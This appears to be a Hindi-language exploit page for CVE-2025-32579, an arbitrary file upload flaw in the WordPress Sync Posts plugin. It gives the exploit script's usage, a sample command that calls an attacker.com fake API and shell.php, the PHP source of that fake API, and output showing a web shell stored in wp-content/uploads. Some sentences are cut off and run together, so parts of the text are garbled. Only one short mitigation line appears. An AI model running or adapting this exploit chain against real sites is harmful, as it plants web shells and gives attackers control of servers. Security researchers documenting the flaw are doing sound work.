
WordPress Sync Posts Plugin <= 1.0 में Arbitrary File Upload की कमजोरी है।
📦 प्रभावित: Sync Posts <= 1.0
🧨 CVSS स्कोर: 9.9 गंभीर
📁 CVSS वेक्टर:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
SoftClever Limited द्वारा Sync Posts WordPress प्लगइन अप्रतिबंधित फ़ाइल अपलोड भेद्यता से ग्रस्त है जो प्रमाणित हमलावरों को सर्वर पर मनमानी PHP फ़ाइलें (जैसे वेब शेल) अपलोड और निष्पादित करने की अनुमति देता है।
website_url स्वीकार करता है जो JSON पोस्ट लौटाता है।wp-content/uploads के अंदर संग्रहीत की जाती हैं।एक्सप्लॉइट स्क्रिप्ट पूरी श्रृंखला को स्वचालित करती है:
<img src="https://raw.githubusercontent.com/nxploited/cve-2025-32579/HEAD/..."> के रूप में रखते हुए JSON पोस्ट लौटाने वाली नकली API PHP उत्पन्न करता हैadmin-ajax.php?action=sync_posts पर दुर्भावनापूर्ण website_url भेजता है/uploads/ में लाने और सहेजने के लिए मजबूर करता हैusage: CVE-2025-32579.py [-h] -u URL -un USERNAME -p PASSWORD -ws WEBSITE -shell WEBSHELL
Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://target.com/wordpress)
-un, --username USERNAME
Username to login
-p, --password PASSWORD
Password to login
-ws, --website WEBSITE
URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)
-shell, --webshell WEBSHELL
Web shell URL used inside the fake API (can be a test image)
python3 CVE-2025-32579.py -u http://target/wordpress -un admin -p pass123 -ws http://attacker.com/Khaled_alenazi.php -shell http://attacker.com/shell.php
| फ्लैग | विवरण |
|---|---|
-u, --url | लक्ष्य WordPress URL |
-un, --username | WordPress उपयोगकर्ता नाम (admin) |
-p, --password | WordPress पासवर्ड |
-ws, --website | नकली पोस्ट JSON लौटाने वाली दुर्भावनापूर्ण PHP फ़ाइल का URL |
-shell, --webshell | `` के माध्यम से इंजेक्ट करने के लिए वास्तविक शेल फ़ाइल |
आप परीक्षण के लिए वास्तविक शेल के बजाय एक डमी छवि का भी उपयोग कर सकते हैं:
--webshell https://via.placeholder.com/1x1.jpg
यह Khaled_alenazi.php द्वारा लौटाया गया प्रतिक्रिया है:
<?php
header('Content-Type: application/json');
echo json_encode([
[
"id" => 1,
"title" => ["rendered" => "Nxploited"],
"content" => [
"rendered" => "<img src="http://attacker.com/shell.php">"
]
]
]);
?>
[*] Attempting login...
[+] Logged in successfully.
[+] Generated fake API PHP file: Khaled_alenazi.php
[+] Sending exploit request to: http://target.com/wordpress
[+] Request sent successfully.
{
"success": true,
"data": {
"message": "Posts imported successfully",
...
}
}
shell.phpwp-content/uploads/2025/04/shell.phpwebsite_url तक पहुँच को आंतरिक डोमेन या श्वेतसूचीबद्ध होस्ट तक सीमित करेंCVE: CVE-2025-32579
एक्सप्लॉइट द्वारा: Nxploited (Khaled Alenazi)